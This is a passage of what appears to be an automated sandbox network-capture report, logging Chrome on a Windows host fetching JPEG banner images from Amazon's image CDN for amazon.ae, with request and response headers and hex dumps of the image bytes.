                                                                                                                                                                                                        2024-08-15 13:38:04 UTC135INData Raw: ff 00 56 01 ad 27 a9 03 61 35 9d 13 68 a5 66 25 91 0b 72 96 4a 7f 6d ec 3e 6e af a0 1d 15 9f 0e 2a 88 7c 15 4e 77 1a 48 07 49 ec 95 f9 ca 5f 31 4b c6 86 d0 ea 31 24 f1 3b d4 e2 ad 19 e8 6f 47 34 72 78 aa a1 81 f3 cf 13 91 cc 9a a6 5f b5 56 2a 7d ca 8c 6a 47 0d ed f0 1c a0 ab 78 00 00 00 00 00 00 00 00 11 a6 c2 87 2d 9c 28 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f ff d9
                                                                                                                                                                                                        Data Ascii: V'a5hf%rJm>n*|NwHI_1K1$;oG4rx_V*}jGx-(X?


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        72192.168.2.449848151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC695OUTGET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-monitor_372x232_ae-en._SY116_CB608574213_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 5228
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: c691086d-9760-4065-b407-71c8ff0ce393
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 28 Sep 2022 13:34:14 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 16 Feb 2044 11:11:18 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 791406
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100086-IAD, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 99 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 06 05 07 08 04 09 02 10 00 02 01 03 02 02 05 09 06 05 03 02 07 00 00 00 01 02 03 00 04 11 05 12 06 21 13 14 22 31 92 07 32 33 41 51 53 73 b2 d1 08 15 42 71 72 b1 16 23 24 61 81
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"123AQSsBqr#$a
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: db d0 c3 f0 e3 f9 45 4d 40 29 4a 50 12 db fa 48 ff 00 52 d7 32 70 65 b4 d3 e9 57 88 15 2e 62 9a 5b f5 6b 6f 45 71 1e d9 19 03 c3 23 11 1b f3 1b c2 36 c3 1b e5 96 41 90 a7 a6 ed fd 24 7f a9 7f 7a e6 7e 15 d9 f7 04 f7 60 91 d4 a6 d5 d9 c0 c7 68 2c 92 4a 07 30 46 4f a8 e5 7e 6c d3 5e 6e 30 56 2c a5 f9 11 5b 41 3e a1 6b 7b 71 79 94 b8 82 1c 5d 42 ca 52 f3 09 94 77 20 96 2f 18 42 4c 6f 99 72 37 2c 53 45 92 b5 4a bd e1 0b 59 c0 31 44 25 3b 11 18 c6 bb 70 aa e4 f4 a3 05 a4 2e 8a ea 98 5e 92 1c 05 0c ed 5b 8a f6 78 2f 6d d1 e5 88 5c da ed 90 62 e1 55 0c 4c b9 47 02 5d e5 90 10 36 86 0f 26 fd c1 6b 1b ad 69 48 e9 16 9c 97 1d 0b 59 5c 23 f4 37 19 76 1d 8c 15 17 0a 49 0a d1 77 49 2c 52 30 c5 55 0e a9 c5 ed b3 2d 69 49 5a 4a e7 3d 8d 0e 78 36 6d fe 61 2e a0 88 c6 58
                                                                                                                                                                                                        Data Ascii: EM@)JPHR2peW.b[koEq#6A$z~`h,J0FO~l^n0V,[A>k{qy]BRw /BLor7,SEJY1D%;p.^[x/m\bULG]6&kiHY\#7vIwI,R0U-iIZJ=x6ma.X
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: 1d 4e 4c 9d a3 92 89 52 49 16 c1 bc 8c 35 ae a6 a5 ae 0c fd 2a 34 d7 16 8c 63 98 43 29 67 80 6f 5d c7 28 48 5e 47 1d a0 eb d8 3c f1 56 ab 26 54 95 d8 4a c1 a2 79 99 bf a4 7d a4 ba f4 b8 21 18 96 58 5a 6c c4 83 3b 76 47 8f 34 93 4d d5 f4 8b 7d 4b 5d 7b 49 d8 c5 6f 6f 3d c3 c8 c9 e9 0b 40 51 14 6f ed 84 c6 e5 4c 9d e1 72 5b b8 93 59 fe 26 b1 36 16 90 5a 5d 89 23 96 ea e6 54 78 d6 20 ec 99 4b 59 19 44 71 f2 38 45 29 18 19 1b 5f 3d e1 49 60 e5 c3 fe 16 ba 91 8b b3 5f d2 da b6 3f d4 c6 5a e5 f7 ec 8b b4 6d 9c 9e c3 6e 65 66 3d b1 d6 5b 3d 38 de 81 cc 87 3e 72 15 cd c3 a2 c5 71 d5 6e 0d c5 cc 80 49 30 18 2b 0e ed db d8 ef 21 50 b0 89 72 b0 fb 84 6c 0c 56 be e0 74 2d 61 30 b7 2c 51 44 1d 1a b9 12 aa 2b 99 a4 6c 3b 6d 0d d9 50 e5 1b 29 11 ce 43 06 65 ac c7 0a 6a
                                                                                                                                                                                                        Data Ascii: NLRI5*4cC)go](H^G<V&TJy}!XZl;vG4M}K]{Ioo=@QoLr[Y&6Z]#Tx KYDq8E)_=I`_?Zmnef=[=8>rqnI0+!PrlVt-a0,QD+l;mP)Cej
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1094INData Raw: 12 aa 26 64 25 c1 c8 68 ae 9d f7 f7 86 72 bb 49 0a a2 b2 b1 71 b7 0e 6b 18 4b 99 66 b4 7f 5a 5d 2a 4c be 39 56 e1 17 c5 19 ab 74 3a 44 ce f0 bd a5 ca 3e 48 29 89 26 b7 1f e9 01 ae a0 3e 00 05 47 d0 9f 16 3a dc ec ee 65 bc 9c 86 5e 1d d1 d5 c0 0c b0 30 2a be 68 2b 23 82 16 ae 75 4d f2 79 91 a0 69 81 bb c2 4c 0f e6 26 94 1a b9 56 c3 20 a5 29 40 29 4a 50 10 db 7a 18 7e 1c 7f 28 a9 aa 1b 6f 43 0f c3 8f e5 15 35 00 a5 29 40 4b 6f e9 23 fd 4b fb d7 cd b9 99 9e 6b 85 55 67 2b 75 75 80 77 15 1f cc 63 d9 c8 2a b8 ef 24 06 35 f4 85 1f 63 06 f6 11 5a 39 7e cf 5c 32 65 96 59 cd d4 ed 23 96 21 e7 54 50 58 96 6c 04 8d 6a 32 86 4a c4 e1 53 07 73 92 9e 32 3b 73 48 14 73 e7 91 b8 ff 00 92 4b 1f f0 46 6b ca fa d4 16 ea 52 d8 81 ff 00 a8 b0 3f f0 08 15 db d6 de 45 38 3a d4
                                                                                                                                                                                                        Data Ascii: &d%hrIqkKfZ]*L9Vt:D>H)&>G:e^0*h+#uMyiL&V )@)JPz~(oC5)@Ko#KkUg+uuwc*$5cZ9~\2eY#!TPXlj2JSs2;sHsKFkR?E8:


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        73192.168.2.449849151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC726OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 39588
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: a5b0bbc1-5c2a-49eb-89d2-887d4c0d5470
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 17 Aug 2021 07:38:05 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 12 Jul 2044 04:37:45 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1466657
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000093-IAD, cache-ewr-kewr1740054-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3b 00 01 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 07 08 06 09 04 05 0a 03 02 01 0b 01 01 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 05 06 07 08 09 02 04 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f7 f0 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF;
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: de 3d 92 e8 ab f5 5b dd ac 7a ab be 9f d6 ef 28 fb 4a c7 c0 35 5b ae 1b e3 e5 63 9b 1d e4 00 00 00 00 00 07 4c 8c 0b 09 9f 98 2c be 01 c2 9c ca 7f c3 b0 7d 68 d7 cb cd af 98 34 00 00 00 60 79 0e eb a9 5b 91 b0 39 b5 89 6c 5b bd 2f d7 a1 f1 fa 26 51 4e 81 ed 47 f6 10 be 1c f5 d5 41 14 66 2b fa b2 ed 4e 6e 96 70 f6 3f b3 1a ab 84 f6 7f fa 3a d1 bb 7f d2 6d 77 1e 53 b9 b3 de bd 5b eb 7e f5 00 00 00 00 00 1f 22 b0 f9 9b 63 3d 4b ef a5 49 de f7 1b 79 55 cd f8 be 4d 62 6d a6 ce c7 d7 25 c1 b8 5d 21 d3 e0 00 00 0c 42 f5 b8 69 ee eb 6c 5e 57 68 50 2e 36 91 eb 90 eb 2a df 6d 21 df 5d 9f e7 fc 1f 25 e2 d0 3d 5e fe 7a 53 8d dd d8 fc 62 eb ad dc 9d 21 d7 0c 9a d3 a2 58 ee 88 61 9d b8 7e 94 39 f3 d3 fc d5 1f 09 dc 69 fd 51 61 f4 8b 88 00 00 00 00 3a f4 78 06 17 0f 42
                                                                                                                                                                                                        Data Ascii: =[z(J5[cL,}h4`y[9l[/&QNGAf+Nnp?:mwS[~"c=KIyUMbm%]!Bil^WhP.6*m!]%=^zSb!Xa~9iQa:xB
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: f5 30 8f 61 18 74 68 f3 0f bc 13 87 a9 7d e2 03 ad 46 be c2 65 94 8c a0 04 31 09 99 7c 7c e7 0f 20 01 3c e1 ac 53 b8 1e 5e 73 b7 fb e6 00 00 00 00 00 00 00 00 00 be 1d b7 d5 38 6f a4 d5 ff 00 26 fc cc ef c4 82 f3 d1 a3 10 c3 dc f5 19 7d 2a 30 17 99 92 04 7c ca f1 f0 20 a8 4c ce 23 e7 3d 79 03 10 7a c1 e1 ea 67 8c b0 00 1b 48 e7 66 8a db 3d 68 c0 00 00 00 00 00 00 00 00 00 da c7 e9 8b 42 66 7d e5 c6 be 15 78 d5 fa 9e eb fe 7f ac 56 5f 33 6c d7 a9 40 42 70 99 fb 26 98 cb f9 15 97 cc d9 d3 d4 bc ad 01 13 43 df 38 92 e3 e0 00 06 6b 69 db 3b ae e4 b7 33 7b 8a 55 38 00 00 00 00 00 00 00 03 eb 6f 4b f6 3d cb 2c b2 f7 a0 78 fd e5 b7 e8 96 84 61 2d b0 10 1c 26 4b 51 f1 91 20 04 01 09 b2 6c 7c 66 4f 3c 44 60 48 7b e0 c2 3f d3 9c 58 3f 52 bf 40 00 01 7b b4 e7 55 b6
                                                                                                                                                                                                        Data Ascii: 0ath}Fe1|| <S^s8o&}*0| L#=yzgHf=hBf}xV_3l@Bp&C8ki;3{U8oK=,xa-&KQ l|fO<D`H{?X?R@{U
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: df b0 f2 9b f0 f6 98 90 b8 f3 b3 f6 38 7b be 9e 4b 58 c3 d4 60 21 59 27 fa 6c eb 7b 9c cc e3 f2 a4 98 b2 ff 00 23 ef 4d 9c cf f2 dc 8a 96 c9 ef 53 9c 49 f3 5b 93 5b 66 fb dc 66 74 47 de 4a 32 79 fe 4c 77 d3 c9 88 08 03 e8 18 67 e9 fe bb 45 ef c3 da 52 4d 63 ce cf de e2 17 7c 4c 4b 25 c2 59 22 c9 57 8d fb cf 5f cb 58 d2 d2 29 92 0a ef 1c f1 75 7f 2d 9f f7 12 8a 26 91 0e aa a7 04 92 4c 04 54 52 e9 bc ce 26 a6 8a ad fc f9 e9 34 92 5a ff 00 57 db 77 d1 b9 c8 8a 88 53 e0 1a 56 9b 8e a0 47 96 6c 9d 90 6e 42 a7 a4 b6 f7 d2 88 a9 f3 32 f8 95 9c 9d 90 69 a2 9f a3 56 f7 d1 68 a7 f2 b2 a9 6f a3 73 8e 14 d0 b8 40 34 b2 b7 0d 00 ef 29 7b cc e2 6b 90 a4 df cf 9e 8c c9 2b a7 f5 7a 6a 26 a9 08 aa 47 05 52 50 00 53 53 eb 25 a6 22 a0 58 2f 29 35 24 84 4c 73 60 d5 c3 ec 87
                                                                                                                                                                                                        Data Ascii: 8{KX`!Y'l{#MSI[[fftGJ2yLwgERMc|LK%Y"W_X)u-&LTR&4ZWwSVGlnB2iVhos@4){k+zj&GRPSS%"X/)5$Ls`
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: cb 02 65 55 52 a2 61 3a 20 61 e5 1e ba 84 6b ab 04 1b 69 95 ba bc 43 87 8d 89 2a be 65 a4 63 98 ec 67 26 ed 18 66 30 eb b0 4d 31 81 7b f0 ab ec 3c d7 07 11 1f a6 86 66 dd 22 29 f1 a5 6d 0d 18 98 c8 37 2f 5b 70 5f 9b 65 ed 33 0b 0f 75 70 6e 5f e4 09 f9 80 1d 7a f9 f6 6b 6e 93 44 43 ac 70 3b 27 eb b4 5c d3 39 52 fb 93 70 2e 5f 9d bf b3 87 6e c8 1d 73 d1 df 38 fc 62 69 9d cc 30 7b 36 9b 1c 6d 42 bb 33 66 97 53 97 1d 08 81 d7 72 37 0b 4c 9d d6 cd 35 6a 98 3f 1b f9 a5 cc b2 a5 d9 07 4e 5a 89 c5 b3 83 b7 15 03 85 41 e8 2b a7 25 40 ed 4a e0 e5 6a a0 f1 28 db a1 47 4e 56 4d 14 55 70 75 51 6f d8 82 5f 06 ac c3 ce 96 38 46 3a 71 15 77 29 73 43 e2 da 66 4c d1 30 60 d8 dc 2e 17 0d 56 53 66 ed 9c 3b 53 94 d9 13 2c a7 f2 9a b9 34 42 f1 8b 11 d3 63 14 c4 30 90 e5 12 18
                                                                                                                                                                                                        Data Ascii: eURa: akiC*ecg&f0M1{<f")m7/[p_e3upn_zknDCp;'\9Rp._ns8bi0{6mB3fSr7L5j?NZA+%@Jj(GNVMUpuQo_8F:qw)sCfL0`.VSf;S,4Bc0
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: dd 27 b4 31 87 72 8b 84 9e 87 5d 66 72 a8 86 d1 92 0d e5 a3 63 e5 59 8f 13 49 34 12 70 d4 db c9 d8 46 bb 86 ae 2a a6 7e 17 12 c9 27 1e dc 3e 24 9d a1 a3 31 32 4d 43 ad ae 1e 23 cf b1 ce 08 f2 b8 f9 23 b2 54 d7 66 ed 5d d9 12 11 fd 06 95 d9 d9 25 db b4 b4 4a 91 2a a6 9a 8a 95 5e 68 08 94 59 ce 4a c4 02 48 2e 97 1b 7d 03 96 94 6c db 29 30 e1 48 fc b5 ff 00 56 f8 59 87 3e 7e 46 40 43 52 b0 6d c2 5f 60 c5 29 ca 62 1c a0 72 1c 34 39 2c 8c dc e1 6c b2 84 84 71 0c 11 3c c0 72 c5 27 f9 2a 9a c1 34 8e 69 72 ba 15 c8 53 a6 9b 3c b1 4d 74 a0 26 77 6a b2 e2 f0 3b 77 2d de 22 9b 96 8b 91 cb 75 43 54 97 f6 ad b1 26 03 f9 d1 02 ea 53 68 0e c3 68 e9 87 d1 62 3d 59 4d 53 37 ce 89 ee 6f 84 9a 11 aa 44 3f f3 ba 76 e1 ea c6 5d ca a2 aa a6 fd 40 04 44 00 03 51 1f 00 ae 45 0c
                                                                                                                                                                                                        Data Ascii: '1r]frcYI4pF*~'>$12MC##Tf]%J*^hYJH.}l)0HVY>~F@CRm_`)br49,lq<r'*4irS<Mt&wj;w-"uCT&Shhb=YMS7oD?v]@DQE
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: 05 84 15 26 cd d7 4d ca 09 38 48 75 4d 62 81 8b b5 72 5c f0 33 91 92 c4 ed 06 6a 80 aa 54 56 49 c2 29 38 40 e0 a2 2b 94 a7 45 4c db 4e 25 b2 90 f9 44 92 e2 95 80 03 3c 8e 36 ed 16 a3 bd 87 96 a9 39 53 89 48 63 03 88 d0 fa 09 c9 0f 37 47 2c b1 47 45 8f dc 6f d1 05 1f e7 19 14 92 30 6a 8a 7d f7 1e c5 a1 0e 4c c2 e6 d3 42 b8 02 9c bd 15 47 00 b4 42 69 eb de 6c 63 10 db 55 43 5b 45 67 fe a2 cb 6c b8 4e 0c ab 92 83 f8 cf 4b 0f b0 f5 e2 2c 1b 28 e5 71 d0 89 fe 89 a7 21 68 7e 26 30 f0 22 4f 11 8f 8b 67 1a 9f 03 64 b4 37 ef 5b a6 2b bd 6a 38 8f f8 ae 47 67 0d 1b 3b 27 03 94 0a b1 7f 84 8d 40 83 aa 91 aa 70 0f fb bb 39 a9 48 55 7a a3 e4 cc a2 45 f1 45 8b f6 b2 08 f3 9a a9 c6 1f b8 bd 33 f1 de 71 8f 39 48 1a b8 43 be 86 d5 19 2e c3 c6 2a 6e d0 d4 cd 7a 31 05 a7 af
                                                                                                                                                                                                        Data Ascii: &M8HuMbr\3jTVI)8@+ELN%D<69SHc7G,GEo0j}LBGBilcUC[EglNK,(q!h~&0"Ogd7[+j8Gg;'@p9HUzEE3q9HC.*nz1
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ca 25 c4 90 f0 2e 5f cd 6f d1 6b 91 22 2c fa 89 0d aa ee b4 e3 2d 55 a9 9b c6 73 0e 1a 19 d1 84 e1 ed d7 a6 dc d7 66 19 cb 35 ed 33 63 7b d4 a3 df b6 94 62 d6 41 9a 9c d6 af 08 55 11 3f d3 7f f1 af f9 41 46 f9 9e 16 2a 2f ba 26 60 dd 24 95 36 db cb d4 86 a7 97 ac a5 4d 2e 5b 2b 08 96 51 8f 4d c1 90 91 56 f2 09 86 9c 5d c5 46 25 e8 48 30 6e e7 5e f8 86 8b 07 4d a6 27 90 70 94 6a 1c 05 30 fe 20 20 a4 bc e4 c0 8a 1c 7d fa 5d c7 1d 0b a0 8b 94 8e 82 e9 82 a9 29 f3 11 fd 61 eb 25 7a cc 52 86 50 a5 ed 29 53 b3 cc 33 f7 4e 92 2a 86 2f 8e ca da e5 5c 7b a6 e9 11 23 1b c0 63 2b 8e de af d7 25 b8 8a 41 1d 45 30 00 28 01 4a 1a 14 bd 80 1e de 1e b5 72 95 52 ac f1 4f 76 bf 12 91 46 fa 6c 7b 12 33 36 e8 74 38 44 51 6a a7 59 74 3d 1b e8 d3 06 46 ad 01 77 6a 97 12 f5 c5
                                                                                                                                                                                                        Data Ascii: %._ok",-Usf53c{bAU?AF*/&`$6M.[+QMV]F%H0n^M'pj0 }])a%zRP)S3N*/\{#c+%AE0(JrROvFl{36t8DQjYt=Fwj
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ea 9f 16 7d b5 af ed ea 9f 16 7d b5 af ed ea 9f 16 7d b5 af ed ea 9f 16 7d b5 af ed ea 9f 16 7d b5 af ed ea 9f 16 7d b5 af ed ea 9f 16 7d b5 af ec db 18 e3 56 4e 50 78 cf 1e c1 b4 76 d4 e5 51 ab af fc eb 62 f2 8a 64 64 32 d6 43 c5 34 4d db 5d 64 59 4a 24 b4 c4 7f 0c 47 94 8e 42 b5 67 89 81 de 0f 77 a9 dc 2f 1f 36 3f 83 9c 66 f1 ac 83 46 af d8 b8 23 c6 2f 93 22 cc dd f4 ef 25 6f b1 50 70 46 53 b9 d4 a4 3c d3 65 ad c4 39 75 0b 25 b8 76 59 c8 19 9f 05 7a 65 92 a7 fd 24 b2 79 e6 41 a7 9c 7d 9c 35 bc 66 3a ce b2 f9 06 12 8a 67 a7 77 8d 1c a0 d6 c6 7d b2 c6 53 a8 e1 8a 14 f6 45 bb bb 3b 68 18 12 00 a8 9c 3e fe 9b cd 64 b3 2f 39 87 77 51 71 3d 49 2a a7 23 49 5d d8 b7 81 bb e6 f4 6e 4c 72 0e 18 93 c3 96 3a 58 c7 73 99 de 37 8a c7 78 fb 2b 50 b0 dc f9 9e 8d cf 23
                                                                                                                                                                                                        Data Ascii: }}}}}}}VNPxvQbdd2C4M]dYJ$GBgw/6?fF#/"%oPpFS<e9u%vYze$yA}5f:gw}SE;h>d/9wQq=I*#I]nLr:Xs7x+P#
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: 79 12 a9 9c 56 ac b0 5b 8c 6f 41 57 62 4a b5 77 7d 29 68 8a 82 01 ca 68 8e 1a c6 8b e2 7c 77 0f 45 7f 70 7f 90 1e 47 99 ca 92 16 b7 1e 4d 8b 0d 5e e5 3d 39 83 f7 93 9a c4 10 36 15 04 ca c4 53 60 5c 55 6a 15 4a bb c9 a7 16 47 75 b8 d6 2c 1d 58 b7 82 c2 a8 e7 ac 7f e8 49 ed 8f 69 0e 9b bd 6d 21 17 63 5f 70 4d e5 dc a6 78 35 f7 d5 9d 71 57 54 39 6a 35 dd 97 74 cc 79 bb 1c 4c 81 6b ab ad 61 b6 cf 10 84 b0 dc 77 a5 dc 9a 2f 78 6b 55 73 23 40 5f 1c e3 5c 87 5b 49 16 e9 cd ee f3 83 2e 98 92 02 d3 17 92 73 3c ae 73 79 68 3a 3a ba 98 f2 79 59 e9 b7 29 9b 5e ed 19 ea 47 0e 32 b0 08 f5 fa c6 ef bb 8b c5 62 cb f2 d9 87 26 5f de 66 3c aa 71 31 d9 ce ef 3d b9 ff 00 f4 90 b9 e3 8b 77 ac 3f 43 7d 5f 01 83 cd fb 67 8d c0 e2 b2 26 40 71 97 b1 3e 45 7b 86 b2 43 e5 45 c4 ab
                                                                                                                                                                                                        Data Ascii: yV[oAWbJw})hh|wEpGM^=96S`\UjJGu,XIim!c_pMx5qWT9j5tyLkaw/xkUs#@_\[I.s<syh::yY)^G2b&_f<q1=w?C}_g&@q>E{CE


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        74192.168.2.44984718.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC457OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 1870
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 3d3f4120-11ba-4561-a960-7d93e428a689
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 06:08:17 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-054,/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Wed, 10 Aug 2044 06:08:17 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-054 /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 134cb849e01fafad6f264ff9633b073e.cloudfront.net (CloudFront)
